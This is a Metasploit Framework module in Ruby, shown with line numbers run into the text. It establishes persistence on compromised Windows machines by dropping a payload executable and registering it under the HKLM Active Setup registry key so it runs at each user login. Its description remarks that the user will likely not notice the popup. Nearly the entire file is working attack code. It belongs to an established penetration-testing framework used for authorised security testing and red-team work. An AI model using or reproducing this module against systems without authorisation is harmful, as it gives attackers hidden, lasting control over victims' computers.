Path: blob/master/modules/exploits/windows/persistence/registry_active_setup.rb
36035 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Exploit::Powershell9include Msf::Post::Windows::Registry10include Msf::Post::File11include Msf::Exploit::EXE12include Msf::Exploit::Local::Persistence13prepend Msf::Exploit::Remote::AutoCheck1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'Windows Registry Active Setup Persistence',20'Description' => %q{21This module will register a payload to run via the Active Setup mechanism in Windows.22Active Setup is a Windows feature that runs once per user at login.23It triggers in a user context, losing privileges from admin to user.2425Active Setup will open a popup box with "Personalized Settings" and the text26"Setting up personalized settings for: <SETUP_NAME>". However27this won't occur until the login screen has exited (but before the desktop28is loaded), and our execution is extremely fast so likely the user will not29see it.30},31'License' => MSF_LICENSE,32'Author' => [33'h00die',34],35'Platform' => [ 'win' ],36'SessionTypes' => [ 'meterpreter' ],37'Targets' => [38[ 'Automatic', {} ]39],40'References' => [41['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],42['ATT&CK', Mitre::Attack::Technique::T1547_014_ACTIVE_SETUP],43['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],44['URL', 'https://hadess.io/the-art-of-windows-persistence/']45],46'DefaultTarget' => 0,47'DisclosureDate' => '2015-12-01',48'Notes' => {49'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],50'Stability' => [CRASH_SAFE],51'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS, SCREEN_EFFECTS]52}53)54)5556register_options([57OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),58OptString.new('SETUP_NAME', [false, 'Name of the setup program.', 'Update']),59])60end6162def regkey63'HKLM\\Software\\Microsoft\\Active Setup\\Installed Components'64end6566def writable_dir67d = super68return session.sys.config.getenv(d) if d.start_with?('%')6970d71end7273def check74return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft\\').include?('PowerShell')7576vprint_good('Powershell detected on system')7778# test write to see if we have access79rand = Rex::Text.rand_guid8081vprint_status("Checking registry write access to: #{regkey}\\#{rand}")82return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{regkey}\\#{rand}") if registry_createkey("#{regkey}\\#{rand}").nil?8384registry_deletekey("#{regkey}\\#{rand}")8586Msf::Exploit::CheckCode::Vulnerable('Registry writable')87end8889def install_persistence90payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))91payload_name << '.exe' unless payload_name.downcase.end_with?('.exe')92payload_exe = generate_payload_exe93payload_pathname = writable_dir + '\\' + payload_name + '.exe'94vprint_good("Writing payload to #{payload_pathname}")95fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)9697rand = Rex::Text.rand_guid98rand = Rex::Text.rand_guid while registry_key_exist?("#{regkey}\\#{rand}")99100print_status("Using installer guid: #{rand}")101registry_createkey("#{regkey}\\#{rand}")102registry_setvaldata("#{regkey}\\#{rand}", 'StubPath', "cmd /c start \"\" \"#{payload_pathname}\"", 'REG_SZ')103registry_setvaldata("#{regkey}\\#{rand}", '', datastore['SETUP_NAME'], 'REG_SZ')104105@clean_up_rc = %(execute -f cmd.exe -a "/c reg delete \\\"#{regkey}\\#{rand}\\\" /f" -H\n)106@clean_up_rc << %(execute -f cmd.exe -a "/c reg delete \\\"#{regkey.sub('HKLM', 'HKCU')}\\#{rand}\\\" /f" -H\n)107@clean_up_rc << "rm #{payload_pathname.gsub('\\', '/')}\n"108end109end110111112